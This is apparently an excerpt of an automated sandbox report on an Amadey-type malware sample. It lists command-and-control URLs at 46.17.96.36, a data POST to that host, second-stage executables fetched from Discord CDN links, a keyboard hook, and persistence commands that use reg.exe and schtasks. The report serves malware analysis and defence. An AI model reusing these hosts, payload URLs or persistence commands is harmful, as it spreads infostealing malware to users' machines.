              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php#
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php/k8FppT/index.php
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php1
              Source: rnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmp, rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmp, rnyuf.exe, 00000005.00000003.667374060.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1/
              Source: rnyuf.exe, 00000005.00000003.670823365.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=13
              Source: rnyuf.exe, 00000005.00000003.675356425.00000000013E0000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1=1
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1?
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1G
              Source: rnyuf.exe, 00000005.00000003.671834132.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1K
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1Users
              Source: rnyuf.exe, 00000005.00000003.670823365.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1_
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1l
              Source: rnyuf.exe, 00000005.00000003.669850855.00000000013A6000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1m7.
              Source: rnyuf.exe, 00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1mpA
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1o
              Source: rnyuf.exe, 00000005.00000003.669850855.00000000013A6000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1p6
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1qk6jl
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php?scr=1s
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.phpP
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe
              Source: rnyuf.exe, 00000005.00000003.667374060.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe(
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeH
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exed
              Source: rnyuf.exe, 00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exen
              Source: rnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/N
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeJ
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/880877737378734114/880877786884112404/1sb1iwyem7.exeW
              Source: rnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
              Source: rnyuf.exe, 00000005.00000003.667402130.00000000013A6000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.clo
              Source: rnyuf.exe, 00000005.00000003.667374060.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: rnyuf.exe, 00000005.00000003.669791372.0000000001380000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01006980 InternetCloseHandle,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_01006980
              Source: global trafficHTTP traffic detected: GET /attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe HTTP/1.1Host: cdn.discordapp.com
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Contains functionality to register a low level keyboard hookShow sources
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00408D9C SetWindowsHookExW 00000002,Function_00008D6E,00000000,0000000013_2_00408D9C
              Source: a.exe, 00000003.00000002.662339691.000000000141A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: mvoElayshk.exe, Program.csLarge array initialization: .cctor: array initializer size 203264
              Source: 0.0.mvoElayshk.exe.280000.0.unpack, Program.csLarge array initialization: .cctor: array initializer size 203264
              Source: 0.2.mvoElayshk.exe.280000.0.unpack, Program.csLarge array initialization: .cctor: array initializer size 203264
              Source: mvoElayshk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002848000_2_00284800
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002A08500_2_002A0850
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002951870_2_00295187
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002A3B870_2_002A3B87
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002A3CA70_2_002A3CA7
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002A5EB00_2_002A5EB0
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_002A4EFD0_2_002A4EFD
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010031C03_2_010031C0
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010248703_2_01024870
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010238BD3_2_010238BD
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01013B473_2_01013B47
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_0101F2103_2_0101F210
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010225473_2_01022547
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_010226673_2_01022667
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_0101F6A83_2_0101F6A8
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F238BD5_2_00F238BD
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F248705_2_00F24870
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F031C05_2_00F031C0
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F1F2105_2_00F1F210
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F13B475_2_00F13B47
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F226675_2_00F22667
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F1F76B5_2_00F1F76B
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F238BD11_2_00F238BD
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F2487011_2_00F24870
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F031C011_2_00F031C0
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F1F21011_2_00F1F210
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F13B4711_2_00F13B47
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F2254711_2_00F22547
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F04EF011_2_00F04EF0
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F1F6A811_2_00F1F6A8
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F2266711_2_00F22667
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040602413_2_00406024
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041C87313_2_0041C873
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041A83613_2_0041A836
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040B14013_2_0040B140
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_004171F613_2_004171F6
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040B9A013_2_0040B9A0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040AAA013_2_0040AAA0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040B35013_2_0040B350
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040A3F013_2_0040A3F0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041543A13_2_0041543A
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040C4E013_2_0040C4E0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041C50113_2_0041C501
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041BD0013_2_0041BD00
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041C5DB13_2_0041C5DB
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040A5B013_2_0040A5B0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041074013_2_00410740
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040572913_2_00405729
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0040FFD813_2_0040FFD8
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040602416_2_00406024
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041C87316_2_0041C873
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041A83616_2_0041A836
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040B14016_2_0040B140
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_004171F616_2_004171F6
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040B9A016_2_0040B9A0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040AAA016_2_0040AAA0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040B35016_2_0040B350
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040A3F016_2_0040A3F0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041543A16_2_0041543A
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040C4E016_2_0040C4E0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041C50116_2_0041C501
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041BD0016_2_0041BD00
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041C5DB16_2_0041C5DB
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040A5B016_2_0040A5B0
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041074016_2_00410740
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040572916_2_00405729
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0040FFD816_2_0040FFD8
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: String function: 0100EF20 appears 89 times
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: String function: 010105E0 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: String function: 0041C19E appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: String function: 00404F59 appears 82 times
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: String function: 0041C160 appears 48 times
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: String function: 00290560 appears 89 times
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: String function: 00291C20 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: String function: 00F15F3B appears 46 times
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: String function: 00F0EF20 appears 180 times
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: String function: 00F105E0 appears 78 times
              Source: mvoElayshk.exe, 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameamadey.exe4 vs mvoElayshk.exe
              Source: mvoElayshk.exe, 00000000.00000002.659238935.0000000000709000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs mvoElayshk.exe
              Source: mvoElayshk.exeBinary or memory string: OriginalFilenameamadey.exe4 vs mvoElayshk.exe
              Source: 1sb1iwyem7[1].exe0.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: 1sb1iwyem7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: 5mgcqk6jl[1].exe0.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: 5mgcqk6jl.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\
              Source: mvoElayshk.exeVirustotal: Detection: 55%
              Source: mvoElayshk.exeReversingLabs: Detection: 69%
              Source: mvoElayshk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\mvoElayshk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\mvoElayshk.exe 'C:\Users\user\Desktop\mvoElayshk.exe'
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe'
              Source: C:\Users\user\AppData\Local\Temp\a.exeProcess created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe'
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /F
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 6268 /t /f
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 3184 /t /f
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
